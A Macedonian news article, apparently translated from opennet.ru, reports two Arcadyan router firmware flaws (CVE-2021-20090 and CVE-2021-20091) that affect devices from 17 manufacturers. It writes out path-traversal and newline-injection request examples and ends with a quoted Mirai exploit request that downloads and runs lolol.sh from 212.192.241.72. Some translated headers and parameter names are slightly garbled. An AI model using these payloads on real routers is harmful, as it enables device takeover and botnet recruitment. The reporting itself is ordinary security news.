Ранливост кај Π΄ΠΎΠΌΠ°ΡˆΠ½ΠΈΡ‚Π΅ Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ ΡˆΡ‚ΠΎ влијаС Π½Π° 17 ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΠΈ

МасовСн Π½Π°ΠΏΠ°Π΄ Π΅ снимСн Π½Π° ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π° ΠΏΡ€ΠΎΡ‚ΠΈΠ² домашни Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ Ρ‡ΠΈΡ˜ Ρ„ΠΈΡ€ΠΌΠ²Π΅Ρ€ користи ΠΈΠΌΠΏΠ»Π΅ΠΌΠ΅Π½Ρ‚Π°Ρ†ΠΈΡ˜Π° Π½Π° HTTP сСрвСр ΠΎΠ΄ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΡ˜Π°Ρ‚Π° Arcadyan. Π—Π° Π΄Π° сС Π΄ΠΎΠ±ΠΈΠ΅ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π° Π½Π°Π΄ ΡƒΡ€Π΅Π΄ΠΈΡ‚Π΅, сС користи ΠΊΠΎΠΌΠ±ΠΈΠ½Π°Ρ†ΠΈΡ˜Π° ΠΎΠ΄ Π΄Π²Π΅ пропусти ΡˆΡ‚ΠΎ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° далСчинско ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»Π΅Π½ ΠΊΠΎΠ΄ со ΠΏΡ€Π°Π²Π° Π½Π° root. ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΠΎΡ‚ влијаС Π½Π° ΠΏΡ€ΠΈΠ»ΠΈΡ‡Π½ΠΎ ΡˆΠΈΡ€ΠΎΠΊ опсСг Π½Π° ADSL Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ ΠΎΠ΄ Arcadyan, ASUS ΠΈ Buffalo, ΠΊΠ°ΠΊΠΎ ΠΈ ΡƒΡ€Π΅Π΄ΠΈΡ‚Π΅ испорачани ΠΏΠΎΠ΄ Π±Ρ€Π΅Π½Π΄ΠΎΠ²ΠΈΡ‚Π΅ Beeline (ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠΎΡ‚ Π΅ ΠΏΠΎΡ‚Π²Ρ€Π΄Π΅Π½ Π²ΠΎ Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ΠΈ Π΄Ρ€ΡƒΠ³ΠΈ тСлСкомуникациски ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€ΠΈ. Π—Π°Π±Π΅Π»Π΅ΠΆΠ°Π½ΠΎ Π΅ Π΄Π΅ΠΊΠ° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠΎΡ‚ Π΅ присутСн Π²ΠΎ Ρ„ΠΈΡ€ΠΌΠ²Π΅Ρ€ΠΎΡ‚ Arcadyan повСќС ΠΎΠ΄ 10 Π³ΠΎΠ΄ΠΈΠ½ΠΈ ΠΈ Π·Π° ΠΎΠ²Π° Π²Ρ€Π΅ΠΌΠ΅ успСал Π΄Π° ΠΌΠΈΠ³Ρ€ΠΈΡ€Π° Π½Π° Π½Π°Ρ˜ΠΌΠ°Π»ΠΊΡƒ 20 ΠΌΠΎΠ΄Π΅Π»ΠΈ Π½Π° ΡƒΡ€Π΅Π΄ΠΈ ΠΎΠ΄ 17 Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΠΈ.

ΠŸΡ€Π²Π°Ρ‚Π° ранливост, CVE-2021-20090, ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° пристап Π΄ΠΎ која Π±ΠΈΠ»ΠΎ скрипта Π·Π° Π²Π΅Π±-ΠΈΠ½Ρ‚Π΅Ρ€Ρ„Π΅Ρ˜Ρ Π±Π΅Π· Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π°. Π‘ΡƒΡˆΡ‚ΠΈΠ½Π°Ρ‚Π° Π½Π° ранливоста Π΅ Π΄Π΅ΠΊΠ° Π²ΠΎ Π²Π΅Π±-ΠΈΠ½Ρ‚Π΅Ρ€Ρ„Π΅Ρ˜ΡΠΎΡ‚, Π½Π΅ΠΊΠΎΠΈ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌΠΈ ΠΏΡ€Π΅ΠΊΡƒ ΠΊΠΎΠΈ сС ΠΈΡΠΏΡ€Π°ΡœΠ°Π°Ρ‚ слики, CSS-Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠΈ ΠΈ JavaScript скрипти сС достапни Π±Π΅Π· Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π°. Π’ΠΎ овој ΡΠ»ΡƒΡ‡Π°Ρ˜, Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌΠΈΡ‚Π΅ Π·Π° ΠΊΠΎΠΈ Π΅ Π΄ΠΎΠ·Π²ΠΎΠ»Π΅Π½ пристап Π±Π΅Π· Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π° сС ΠΏΡ€ΠΎΠ²Π΅Ρ€ΡƒΠ²Π°Π°Ρ‚ со помош Π½Π° ΠΏΠΎΡ‡Π΅Ρ‚Π½Π°Ρ‚Π° маска. ΠžΠ΄Ρ€Π΅Π΄ΡƒΠ²Π°ΡšΠ΅Ρ‚ΠΎ Π½Π° Π·Π½Π°Ρ†ΠΈΡ‚Π΅ β€ž../β€œ Π²ΠΎ ΠΏΠ°Ρ‚Π΅ΠΊΠΈΡ‚Π΅ Π·Π° одСњС Π΄ΠΎ родитСлскиот Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌ Π΅ Π±Π»ΠΎΠΊΠΈΡ€Π°Π½ΠΎ ΠΎΠ΄ Ρ„ΠΈΡ€ΠΌΠ²Π΅Ρ€ΠΎΡ‚, Π½ΠΎ ΠΊΠΎΡ€ΠΈΡΡ‚Π΅ΡšΠ΅Ρ‚ΠΎ Π½Π° ΠΊΠΎΠΌΠ±ΠΈΠ½Π°Ρ†ΠΈΡ˜Π°Ρ‚Π° β€ž..%2fβ€œ Π΅ прСскокнато. Π’Π°ΠΊΠ°, ΠΌΠΎΠΆΠ½ΠΎ Π΅ Π΄Π° сС ΠΎΡ‚Π²ΠΎΡ€Π°Π°Ρ‚ Π·Π°ΡˆΡ‚ΠΈΡ‚Π΅Π½ΠΈ страници ΠΊΠΎΠ³Π° сС ΠΈΡΠΏΡ€Π°ΡœΠ°Π°Ρ‚ Π±Π°Ρ€Π°ΡšΠ° ΠΊΠ°ΠΊΠΎ β€žhttp://192.168.1.1/images/..%2findex.htmβ€œ.

Π’Ρ‚ΠΎΡ€Π°Ρ‚Π° ранливост, CVE-2021-20091, ΠΌΡƒ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π½Π° Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΡ†ΠΈΡ€Π°Π½ΠΈΠΎΡ‚ корисник Π΄Π° ΠΏΡ€Π°Π²ΠΈ ΠΏΡ€ΠΎΠΌΠ΅Π½ΠΈ Π²ΠΎ систСмскитС поставки Π½Π° ΡƒΡ€Π΅Π΄ΠΎΡ‚ со ΠΈΡΠΏΡ€Π°ΡœΠ°ΡšΠ΅ ΡΠΏΠ΅Ρ†ΠΈΡ˜Π°Π»Π½ΠΎ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€Π°Π½ΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ Π΄ΠΎ скриптата apply_abstract.cgi, која Π½Π΅ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΡƒΠ²Π° присуство Π½Π° Π·Π½Π°ΠΊ ΠΎΠ΄ Π½ΠΎΠ²Π° линија Π²ΠΎ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈΡ‚Π΅ . На ΠΏΡ€ΠΈΠΌΠ΅Ρ€, ΠΊΠΎΠ³Π° Π²Ρ€ΡˆΠΈ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΡ˜Π° Π·Π° ΠΏΠΈΠ½Π³, Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ ΠΌΠΎΠΆΠ΅ Π΄Π° ја Π½Π°Π²Π΅Π΄Π΅ врСдноста β€ž192.168.1.2%0AARC_SYS_TelnetdEnable=1β€œ Π²ΠΎ ΠΏΠΎΠ»Π΅Ρ‚ΠΎ со IP адрСсата ΡˆΡ‚ΠΎ сС ΠΏΡ€ΠΎΠ²Π΅Ρ€ΡƒΠ²Π° ΠΈ скриптата, ΠΏΡ€ΠΈ ΠΊΡ€Π΅ΠΈΡ€Π°ΡšΠ΅Ρ‚ΠΎ Π½Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° Π·Π° поставки /tmp/etc/config/ .glbcfg, ќС ја напишС Π»ΠΈΠ½ΠΈΡ˜Π°Ρ‚Π° β€œAARC_SYS_TelnetdEnable=1” Π²ΠΎ Π½Π΅Π° β€œ, која Π³ΠΎ Π°ΠΊΡ‚ΠΈΠ²ΠΈΡ€Π° Ρ‚Π΅Π»Π½Π΅Ρ‚ сСрвСрот, кој ΠΎΠ±Π΅Π·Π±Π΅Π΄ΡƒΠ²Π° Π½Π΅ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½ пристап Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π°Ρ‚Π° школка со ΠΏΡ€Π°Π²Π° Π½Π° root. Π‘Π»ΠΈΡ‡Π½ΠΎ Π½Π° Ρ‚ΠΎΠ°, со ΠΏΠΎΡΡ‚Π°Π²ΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Π°Ρ€ΠΎΡ‚ AARC_SYS, ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° ΠΈΠ·Π²Ρ€ΡˆΠΈΡ‚Π΅ кој Π±ΠΈΠ»ΠΎ ΠΊΠΎΠ΄ Π½Π° систСмот. ΠŸΡ€Π²Π°Ρ‚Π° ранливост ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π΄Π° сС ΠΈΠ·Π²Ρ€ΡˆΠΈ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ°Ρ‚ΠΈΡ‡Π½Π° скрипта Π±Π΅Π· Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π° со пристап Π΄ΠΎ Π½Π΅Π° ΠΊΠ°ΠΊΠΎ β€ž/images/..%2fapply_abstract.cgiβ€œ.

Π—Π° Π΄Π° Π³ΠΈ искористи пропуститС, Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ ΠΌΠΎΡ€Π° Π΄Π° ΠΌΠΎΠΆΠ΅ Π΄Π° испрати Π±Π°Ρ€Π°ΡšΠ΅ Π΄ΠΎ ΠΌΡ€Π΅ΠΆΠ½Π°Ρ‚Π° ΠΏΠΎΡ€Ρ‚Π° Π½Π° која Ρ€Π°Π±ΠΎΡ‚ΠΈ Π²Π΅Π±-ΠΈΠ½Ρ‚Π΅Ρ€Ρ„Π΅Ρ˜ΡΠΎΡ‚. Π‘ΡƒΠ΄Π΅Ρ˜ΡœΠΈ спорСд Π΄ΠΈΠ½Π°ΠΌΠΈΠΊΠ°Ρ‚Π° Π½Π° ΡˆΠΈΡ€Π΅ΡšΠ΅Ρ‚ΠΎ Π½Π° Π½Π°ΠΏΠ°Π΄ΠΎΡ‚, ΠΌΠ½ΠΎΠ³Ρƒ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€ΠΈ оставаат пристап Π΄ΠΎ Π½ΠΈΠ²Π½ΠΈΡ‚Π΅ ΡƒΡ€Π΅Π΄ΠΈ ΠΎΠ΄ Π½Π°Π΄Π²ΠΎΡ€Π΅ΡˆΠ½Π°Ρ‚Π° ΠΌΡ€Π΅ΠΆΠ° Π·Π° Π΄Π° ја поСдностават Π΄ΠΈΡ˜Π°Π³Π½ΠΎΠ·Π°Ρ‚Π° Π½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠΈΡ‚Π΅ ΠΎΠ΄ страна Π½Π° слуТбата Π·Π° ΠΏΠΎΠ΄Π΄Ρ€ΡˆΠΊΠ°. Ако пристапот Π΄ΠΎ ΠΈΠ½Ρ‚Π΅Ρ€Ρ„Π΅Ρ˜ΡΠΎΡ‚ Π΅ ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½ само Π½Π° Π²Π½Π°Ρ‚Ρ€Π΅ΡˆΠ½Π°Ρ‚Π° ΠΌΡ€Π΅ΠΆΠ°, ΠΌΠΎΠΆΠ΅ Π΄Π° сС ΠΈΠ·Π²Ρ€ΡˆΠΈ Π½Π°ΠΏΠ°Π΄ ΠΎΠ΄ Π½Π°Π΄Π²ΠΎΡ€Π΅ΡˆΠ½Π° ΠΌΡ€Π΅ΠΆΠ° ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ ја Ρ‚Π΅Ρ…Π½ΠΈΠΊΠ°Ρ‚Π° β€žDNS rebindingβ€œ. ΠŸΡ€ΠΎΠΏΡƒΡΡ‚ΠΈΡ‚Π΅ вСќС Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ сС користат Π·Π° ΠΏΠΎΠ²Ρ€Π·ΡƒΠ²Π°ΡšΠ΅ Π½Π° Ρ€ΡƒΡ‚Π΅Ρ€ΠΈ со Π±ΠΎΡ‚Π½Π΅Ρ‚ΠΎΡ‚ Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ΠŸΠΎΠ²Ρ€Π·ΡƒΠ²Π°ΡšΠ΅: Π·Π°Ρ‚Π²ΠΎΡ€Π΅Ρ‚Π΅ Π³ΠΎ ΠšΠΎΡ€ΠΈΡΠ½ΠΈΡ‡ΠΊΠΈ Π°Π³Π΅Π½Ρ‚: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D_5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Π˜Π·Π²ΠΎΡ€: opennet.ru

Π”ΠΎΠ΄Π°Π΄Π΅Ρ‚Π΅ ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€